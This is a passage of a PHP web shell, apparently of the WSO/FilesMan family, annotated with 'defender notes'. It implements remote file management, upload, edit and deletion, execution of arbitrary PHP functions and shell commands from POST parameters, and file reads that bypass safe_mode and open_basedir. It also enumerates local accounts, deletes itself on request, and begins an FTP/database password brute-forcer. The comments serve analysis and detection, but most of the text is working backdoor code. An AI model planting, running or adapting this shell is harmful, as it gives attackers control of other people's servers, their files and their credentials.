    echo '</pre></div>';
    printFooter();
}
 478 
 479 function actionFilesMan() { 
 480     printHeader(); 
 481     echo '<h1>File manager</h1><div class=content>'; 
 482     if(isset($_POST['p1'])) { 
 483         switch($_POST['p1']) { 
 484             case 'uploadFile': 
 485                 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) 
 486                     echo "Can't upload file!"; 
 487                 break; 
 488                 break; 
 489             case 'mkdir': 
 490                 if(!@mkdir($_POST['p2'])) 
 491                     echo "Can't create new dir"; 
 492                 break; 
 493             case 'delete': 
 494                 function deleteDir($path) { 
 495                     $path = (substr($path,-1)=='/') ? $path:$path.'/'; 
 496                     $dh  = opendir($path); 
 497                     while ( ($item = readdir($dh) ) !== false) { 
 498                         $item = $path.$item; 
 499                         if ( (basename($item) == "..") || (basename($item) == ".") ) 
 500                             continue; 
 501                         $type = filetype($item); 
 502                         if ($type == "dir") 
 503                             deleteDir($item); 
 504                         else 
 505                             @unlink($item); 
 506                     } 
 507                     closedir($dh); 
 508                     rmdir($path); 
 509                 } 
 510                 if(is_array(@$_POST['f'])) 
 511                     foreach($_POST['f'] as $f) { 
 512                         $f = urldecode($f); 
 513                         if(is_dir($f)) 
 514                             deleteDir($f); 
 515                         else 
 516                             @unlink($f); 
 517                     } 
 518                 break; 
 519             case 'paste': 
 520                 if($_SESSION['act'] == 'copy') { 
 521                     function copy_paste($c,$s,$d){ 
 522                         if(is_dir($c.$s)){ 
 523                             mkdir($d.$s); 
 524                             $h = opendir($c.$s); 
 525                             while (($f = readdir($h)) !== false) 
 526                                 if (($f != ".") and ($f != "..")) { 
 527                                     copy_paste($c.$s.'/',$f, $d.$s.'/'); 
 528                                 } 
 529                         } elseif(is_file($c.$s)) { 
 530                             @copy($c.$s, $d.$s); 
 531                         } 
 532                     } 
 533                     foreach($_SESSION['f'] as $f) 
 534                         copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);                     
 535                 } elseif($_SESSION['act'] == 'move') { 
 536                     function move_paste($c,$s,$d){ 
 537                         if(is_dir($c.$s)){ 
 538                             mkdir($d.$s); 
 539                             $h = opendir($c.$s); 
 540                             while (($f = readdir($h)) !== false) 
 541                                 if (($f != ".") and ($f != "..")) { 
 542                                     copy_paste($c.$s.'/',$f, $d.$s.'/'); 
 543                                 } 
 544                         } elseif(is_file($c.$s)) { 
 545                             @copy($c.$s, $d.$s); 
 546                         } 
 547                     } 
 548                     foreach($_SESSION['f'] as $f) 
 549                         @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f); 
 550                 } 
 551                 unset($_SESSION['f']); 
 552                 break; 
 553             default: 
 554                 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { 
 555                     $_SESSION['act'] = @$_POST['p1']; 
 556                     $_SESSION['f'] = @$_POST['f']; 
 557                     foreach($_SESSION['f'] as $k => $f) 
 558                         $_SESSION['f'][$k] = urldecode($f); 
 559                     $_SESSION['cwd'] = @$_POST['c']; 
 560                 } 
 561                 break; 
 562         } 
 563         echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>'; 
 564     } 
 565     $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); 
 566     if($dirContent === false) {    echo 'Can\'t open this folder!'; return;    }
 567     global $sort; 
 568     $sort = array('name', 1); 
 569     if(!empty($_POST['p1'])) { 
 570         if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) 
 571             $sort = array($match[1], (int)$match[2]); 
 572     } 
 573 ?> 
 574 <script> 
 575     function sa() { 
 576         for(i=0;i<document.files.elements.length;i++) 
 577             if(document.files.elements[i].type == 'checkbox') 
 578                 document.files.elements[i].checked = document.files.elements[0].checked; 
 579     } 
 580 </script> 
 581 <table width='100%' class='main' cellspacing='0' cellpadding='2'> 
 582 <form name=files method=post> 
 583 <?php 
 584     echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; 
 585     $dirs = $files = $links = array(); 
 586     $n = count($dirContent); 
 587     for($i=0;$i<$n;$i++) { 
 588         $ow = @posix_getpwuid(@fileowner($dirContent[$i])); 
 589         $gr = @posix_getgrgid(@filegroup($dirContent[$i])); 
 590         $tmp = array('name' => $dirContent[$i], 
 591                      'path' => $GLOBALS['cwd'].$dirContent[$i], 
 592                      'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), 
 593                      'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
 594                      'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 
 595                      'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 
 596                      'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) 
 597                     ); 
 598         if(@is_file($GLOBALS['cwd'].$dirContent[$i])) 
 599             $files[] = array_merge($tmp, array('type' => 'file')); 
 600         elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) 
 601             $links[] = array_merge($tmp, array('type' => 'link')); 
 602         elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != ".")) 
 603             $dirs[] = array_merge($tmp, array('type' => 'dir')); 
 604     } 
 605     $GLOBALS['sort'] = $sort; 
    /*
     * Comparator handed to usort() for the file, dir and link lists.
     * The column and direction come from $GLOBALS['sort'], which is
     * assigned just above from the request's p1 parameter ("s_<col>_<dir>").
     * Every column except 'size' is compared as a string via strcmp();
     * 'size' is compared numerically. Note that equal sizes yield 1, never 0,
     * so the size ordering is not stable.
     */
    function cmp($a, $b) {
        if($GLOBALS['sort'][0] != 'size')
            return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
        else
            return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
    }
 612     usort($files, "cmp"); 
 613     usort($dirs, "cmp"); 
 614     usort($links, "cmp"); 
 615     $files = array_merge($dirs, $links, $files); 
 616     $l = 0; 
 617     foreach($files as $f) { 
 618         echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] 
 619             .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; 
 620         $l = $l?0:1; 
 621     } 
 622     ?> 
 623     <tr><td colspan=7> 
 624     <input type=hidden name=a value='FilesMan'> 
 625     <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> 
 626     <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
 627     <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr> 
 628     </form></table></div> 
 629     <?php 
 630     printFooter(); 
 631 } 
 632 
/*
 * "String conversions" page of the shell.
 *
 * Request contract: p1 is the name of the PHP function to run, p2 is its
 * single argument, 'ajax' selects a JavaScript response instead of a page.
 *
 * Defender notes:
 *  - The function named in p1 is called whenever function_exists() is true
 *    for it; the $stringTools list only populates the dropdown and is not an
 *    allow-list. A POST whose p1 names a function outside that list is
 *    therefore a useful detection signal for this family of shells.
 *  - The AJAX preference is persisted in $_SESSION under the key
 *    md5(HTTP_HOST).'ajax', and the AJAX response is "<length>\n<javascript>"
 *    followed by exit(), with no HTML at all.
 *  - The hex2bin() fallback does not behave like PHP's native hex2bin(): it
 *    returns a string of binary digits (decbin(hexdec($p))), not raw bytes.
 */
function actionStringTools() {
    // Fallback helpers, defined only when the host lacks a function of that name.
    if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
    if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
    if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}

    // AJAX path: run the conversion and answer with a JS snippet that fills #strOutput.
    if(isset($_POST['ajax'])) {
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        // Client-supplied function name, client-supplied argument (see notes above).
        if(function_exists($_POST['p1']))
            echo $_POST['p1']($_POST['p2']);
        $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'&#92;&#48;")."';\n";
        // Length-prefixed body, then stop; no page chrome is emitted on this path.
        echo strlen($temp), "\n", $temp;
        exit;
    }
    printHeader();
    echo '<h1>String conversions</h1><div class=content>';
    // Label => PHP function name. The name is what the form posts back as p1.
    $stringTools = array(
        'Base64 encode' => 'base64_encode',
        'Base64 decode' => 'base64_decode',
        'Url encode' => 'urlencode',
        'Url decode' => 'urldecode',
        'Full urlencode' => 'full_urlencode',
        'md5 hash' => 'md5',
        'sha1 hash' => 'sha1',
        'crypt' => 'crypt',
        'CRC32' => 'crc32',
        'ASCII to HEX' => 'ascii2hex',
        'HEX to ASCII' => 'hex2ascii',
        'HEX to DEC' => 'hexdec',
        'HEX to BIN' => 'hex2bin',
        'DEC to HEX' => 'dechex',
        'DEC to BIN' => 'decbin',
        'BIN to HEX' => 'bin2hex',
        'BIN to DEC' => 'bindec',
        'String to lower case' => 'strtolower',
        'String to upper case' => 'strtoupper',
        'Htmlspecialchars' => 'htmlspecialchars',
        'String length' => 'strlen',
    );
    // A non-AJAX submit clears the remembered AJAX preference.
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
    echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
    foreach($stringTools as $k => $v)
        echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
        // Despite the indentation this echo is outside the foreach (no braces); it runs once.
        echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
    // Non-AJAX path: same client-named call, result HTML-escaped into the <pre>.
    if(!empty($_POST['p1'])) {
        if(function_exists($_POST['p1']))
        echo htmlspecialchars($_POST['p1']($_POST['p2']));
    }
    echo"</pre></div>";
    // Static HTML below: a form that posts the 'hash' field to third-party lookup sites.
    ?>
    <br><h1>Search for hash:</h1><div class=content>
        <form method='post' target='_blank' name="hf">
            <input type="text" name="hash" style="width:200px;"><br>
            <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>
            <input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()"><br>
            <input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br>
            <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
            <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br>
        </form>
    </div>
    <?php
    printFooter();
}
 698 
/*
 * "File tools" page: view / highlight / download / hexdump / edit / chmod /
 * rename / touch / mkfile on a single path.
 *
 * Request contract: p1 is the (url-encoded) path, p2 the sub-action, p3 the
 * sub-action's argument (new permissions, new contents, new name, timestamp).
 *
 * Defender notes:
 *  - p1 is urldecode()d and then used directly as a filesystem path; nothing
 *    restricts it to the current working directory.
 *  - 'download' streams the file gzip-encoded behind a Content-Disposition
 *    attachment header and exit()s before any page chrome, so such responses
 *    contain no HTML and are distinguishable by their headers.
 *  - 'edit' overwrites the file with p3; 'touch' sets both mtime and atime to
 *    the p3 timestamp, so file timestamps on a host where this shell ran
 *    cannot be trusted for timeline reconstruction.
 *  - 'mkfile' creates an empty file and then switches p2 to 'edit'.
 */
function actionFilesTools() {
    if( isset($_POST['p1']) )
        $_POST['p1'] = urldecode($_POST['p1']);
    // Download path: raw file bytes, 1 KiB at a time, then exit.
    if(@$_POST['p2']=='download') {
        if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
            if (function_exists("mime_content_type")) {
                $type = @mime_content_type($_POST['p1']);
                header("Content-Type: ".$type);
            }
            $fp = @fopen($_POST['p1'], "r");
            if($fp) {
                while(!@feof($fp))
                    echo @fread($fp, 1024);
                fclose($fp);
            }
        } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
            // Directory download is a stub: nothing is sent before the exit below.

        }
        exit;
    }
    // Create an empty file, then fall through to the editor view for it.
    if( @$_POST['p2'] == 'mkfile' ) {
        if(!file_exists($_POST['p1'])) {
            $fp = @fopen($_POST['p1'], 'w');
            if($fp) {
                $_POST['p2'] = "edit";
                fclose($fp);
            }
        }
    }
    printHeader();
    echo '<h1>File tools</h1><div class=content>';
    if( !file_exists(@$_POST['p1']) ) {
        echo 'File not exists';
        printFooter();
        return;
    }
    $uid = @posix_getpwuid(@fileowner($_POST['p1']));
    // Looks up the group by the owner's uid (fileowner, not filegroup), so the
    // displayed group is whichever group has that numeric id.
    $gid = @posix_getgrgid(@fileowner($_POST['p1']));
    echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
    echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
    if( empty($_POST['p2']) )
        $_POST['p2'] = 'view';
    // Sub-action menu: files get the full set, directories only the metadata actions.
    if( is_file($_POST['p1']) )
        $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
    else
        $m = array('Chmod', 'Rename', 'Touch');
    foreach($m as $v)
        echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
    echo '<br><br>';
    switch($_POST['p2']) {
        // Plain text view, HTML-escaped.
        case 'view':
            echo '<pre class=ml1>';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '</pre>';
            break;
        // Syntax-highlighted view; <span> is swapped for <font> in the output.
        case 'highlight':
            if( is_readable($_POST['p1']) ) {
                echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
                $code = highlight_file($_POST['p1'],true);
                echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
            }
            break;
        // p3 is an octal digit string ("755"); converted digit-by-digit to an int.
        case 'chmod':
            if( !empty($_POST['p3']) ) {
                $perms = 0;
                for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
                if(!@chmod($_POST['p1'], $perms))
                    echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
                else
                    die('<script>g(null,null,null,null,"")</script>');
            }
            echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
            break;
        // Editor: when p3 is present it replaces the file contents outright.
        case 'edit':
            if( !is_writable($_POST['p1'])) {
                echo 'File isn\'t writeable';
                break;
            }
            if( !empty($_POST['p3']) ) {
                @file_put_contents($_POST['p1'],$_POST['p3']);
                echo 'Saved!<br><script>document.mf.p3.value="";</script>';
            }
            echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '</textarea><input type=submit value=">>"></form>';
            break;
        // Hex dump: three columns (offset, hex bytes, printable chars), 32 bytes per row.
        // Bytes 0x00, 0x09, 0x0A and 0x0D are shown as a space in the text column.
        case 'hexdump':
            $c = @file_get_contents($_POST['p1']);
            $n = 0;
            $h = array('00000000<br>','','');
            $len = strlen($c);
            for ($i=0; $i<$len; ++$i) {
                $h[1] .= sprintf('%02X',ord($c[$i])).' ';
                switch ( ord($c[$i]) ) {
                    case 0:  $h[2] .= ' '; break;
                    case 9:  $h[2] .= ' '; break;
                    case 10: $h[2] .= ' '; break;
                    case 13: $h[2] .= ' '; break;
                    default: $h[2] .= $c[$i]; break;
                }
                $n++;
                if ($n == 32) {
                    $n = 0;
                    if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
                    $h[1] .= '<br>';
                    $h[2] .= "\n";
                }
             }
            echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
            break;
        // Rename p1 to p3; on success the page is reloaded pointing at the new name.
        case 'rename':
            if( !empty($_POST['p3']) ) {
                if(!@rename($_POST['p1'], $_POST['p3']))
                    echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
                else
                    die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
            }
            echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
            break;
        // Timestamp change: p3 is parsed with strtotime() and applied as both mtime and atime.
        case 'touch':
            if( !empty($_POST['p3']) ) {
                $time = strtotime($_POST['p3']);
                if($time) {
                    if(@touch($_POST['p1'],$time,$time))
                        die('<script>g(null,null,null,null,"")</script>');
                    else {
                        echo 'Fail!<script>document.mf.p3.value="";</script>';
                    }
                } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
            }
            echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
            break;
        // Only reached if file creation above failed (success rewrites p2 to 'edit').
        case 'mkfile':

            break;
    }
    echo '</div>';
    printFooter();
}
 851 
/*
 * "Safe mode bypass" page. Each numbered case reads a file (or lists a
 * directory) through a PHP facility other than a plain fopen(); which of them
 * succeeds depends on the host's PHP version and configuration. All output is
 * captured with output buffering and shown, unescaped, in a <pre> under the
 * forms. p1 selects the case; p2 (and p3 for case 5) is its argument.
 *
 * Defender notes:
 *  - Case 1 creates a temporary file with prefix 'cx' ($test is never
 *    assigned, so PHP falls back to the system temp directory) and unlinks it
 *    after reading — a short-lived artifact in the temp dir.
 *  - Case 4 calls ini_restore() on safe_mode and open_basedir and then
 *    include()s p2, which executes the file if it contains PHP.
 *  - Case 5 enumerates local accounts via posix_getpwuid() over a uid range.
 */
function actionSafeMode() {
    $temp='';
    ob_start();
    switch($_POST['p1']) {
        // Copy through the compress.zlib:// wrapper into a temp file, then print it.
        case 1:
            $temp=@tempnam($test, 'cx');
            if(@copy("compress.zlib://".$_POST['p2'], $temp)){
                echo @file_get_contents($temp);
                unlink($temp);
            } else
                echo 'Sorry... Can\'t open file';
            break;
        // Directory listing via glob() on "<p2>*".
        case 2:
            $files = glob($_POST['p2'].'*');
            if( is_array($files) )
                foreach ($files as $filename)
                    echo $filename."\n";
            break;
        // File read via the curl file:// handler; curl_exec() prints the body directly.
        case 3:
            $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
            curl_exec($ch);
            break;
        // Reset the two restrictions and include() the path (see notes above).
        case 4:
            ini_restore("safe_mode");
            ini_restore("open_basedir");
            include($_POST['p2']);
            break;
        // Print passwd-style records for every uid in [p2, p3].
        case 5:
            for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                $uid = @posix_getpwuid($_POST['p2']);
                if ($uid)
                    echo join(':',$uid)."\n";
            }
            break;
        // File read via imap_open() with empty credentials; skipped if the IMAP extension is absent.
        case 6:
            if(!function_exists('imap_open'))break;
            $stream = imap_open($_POST['p2'], "", "");
            if ($stream == FALSE)
                break;
            echo imap_body($stream, 1);
            imap_close($stream);
            break;
    }
    $temp = ob_get_clean();
    printHeader();
    echo '<h1>Safe mode bypass</h1><div class=content>';
    // One form per case; the JS helper g() posts p1 = case number, p2/p3 = field values.
    echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
    // Captured output is inserted without HTML escaping.
    if($temp)
        echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
    echo '</div>';
    printFooter();
}
 904 
/*
 * "Console" page. Runs the command line in p1 through ex() (defined elsewhere
 * in this file) and shows the result in a read-only textarea. Command history
 * and up/down recall live in client-side JS (cmds[], kp(), add()).
 *
 * Defender notes:
 *  - AJAX path: the response is "<length>\n<javascript>" that appends the
 *    command and its output to document.cf.output, converted to UTF-8 from
 *    the posted 'charset'; exit() follows, so no HTML is emitted.
 *  - A trailing "cd <dir>" in p1 is mirrored server-side with chdir(), and
 *    $GLOBALS['cwd'] is updated so later file-manager requests follow it.
 *  - Both paths echo the executed command prefixed with "$ ", so captured
 *    responses contain the command line as well as its output.
 *  - The 'alias' dropdown is filled from $GLOBALS['aliases'] (defined
 *    elsewhere); an entry with an empty value renders as a group heading.
 */
function actionConsole() {
    if(isset($_POST['ajax'])) {
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        echo "document.cf.cmd.value='';\n";
        // Command + output, escaped for embedding in a single-quoted JS string.
        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'&#92;&#48;"));
        // Keep the shell's working directory in sync with a "cd" typed into the console.
        if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    {
            if(@chdir($match[1])) {
                $GLOBALS['cwd'] = @getcwd();
                echo "document.mf.c.value='".$GLOBALS['cwd']."';";
            }
        }
        echo "document.cf.output.value+='".$temp."';";
        echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
        $temp = ob_get_clean();
        // Length-prefixed body, then stop.
        echo strlen($temp), "\n", $temp;
        exit;
    }
    printHeader();
    // Client-side history: kp() handles up (38) / down (40), add() records a submitted command.
?>
<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
    var n = (window.Event) ? e.which : e.keyCode;
    if(n == 38) {
        cur--;
        if(cur>=0)
            document.cf.cmd.value = cmds[cur];
        else
            cur++;
    } else if(n == 40) {
        cur++;
        if(cur < cmds.length)
            document.cf.cmd.value = cmds[cur];
        else
            cur--;
    }
}
function add(cmd) {
    cmds.pop();
    cmds.push(cmd);
    cmds.push("");
    cur = cmds.length-1;
}
</script>
<?php
    // The form's onsubmit handles "clear" locally and otherwise posts via a() (AJAX) or g().
    echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
    foreach($GLOBALS['aliases'] as $n => $v) {
        if($v == '') {
            echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
            continue;
        }
        echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
    }
    // A non-AJAX submit clears the remembered AJAX preference.
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
    echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
    // Non-AJAX path: command and output rendered HTML-escaped into the textarea.
    if(!empty($_POST['p1'])) {
        echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
    }
    echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
    echo '</form></div><script>document.cf.cmd.focus();</script>';
    printFooter();
}
 971 
/*
 * Logs the operator out by removing the session flag keyed on md5(HTTP_HOST)
 * that marks the session as authenticated, then prints 'bye!'.
 * The PHP session itself (and the '...ajax' preference stored alongside it)
 * is left intact.
 */
function actionLogout() {
    unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
    echo 'bye!';
}
 976 
/*
 * "Suicide" page: when p1 == 'yes', unlink()s the shell's own file
 * (SELF_PATH) and die()s with a confirmation; any other request shows the
 * confirmation link.
 * Defender note: once the file is gone, the POST that triggered the removal
 * (and every earlier request to this path) remains in the web-server access
 * log, which is usually the only trace left of the shell.
 */
function actionSelfRemove() {
    printHeader();
    if($_POST['p1'] == 'yes') {
        if(@unlink(SELF_PATH))
            die('Shell has been removed');
        else
            echo 'unlink error!';
    }
    echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
    printFooter();
}
 988 
/*
 * "Bruteforce" page: credential guessing against FTP, MySQL or PostgreSQL at
 * the "host:port" given in 'server'. Brute type 1 reads login names from the
 * local /etc/passwd and tries login==password (plus the reversed login when
 * 'reverse' is set); type 2 tries each line of the file named in 'dict' as
 * the password for 'login'. Attempts and successes are counted and each hit
 * is echoed as <b>login</b>:password.
 *
 * Defender notes:
 *  - bruteForce() is declared conditionally, so exactly one protocol variant
 *    exists per request. Only the FTP variant does what the UI claims; the
 *    mysql and pgsql variants are not functional as written (the pgsql one
 *    builds $str and never uses it).
 *  - Every attempt is a separate connect/login/close, so the target service
 *    logs one failed authentication per /etc/passwd entry or dictionary line,
 *    all originating from the web server's address — a loud signal.
 *  - The dictionary path defaults to "passwd.dic" in the shell's cwd; its
 *    presence on a web host is itself an indicator.
 */
function actionBruteforce() {
    printHeader();
    if( isset($_POST['proto']) ) {
        echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
        // Per-protocol login probe; returns a truthy value on successful authentication.
        if( $_POST['proto'] == 'ftp' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $fp = @ftp_connect($ip, $port?$port:21);
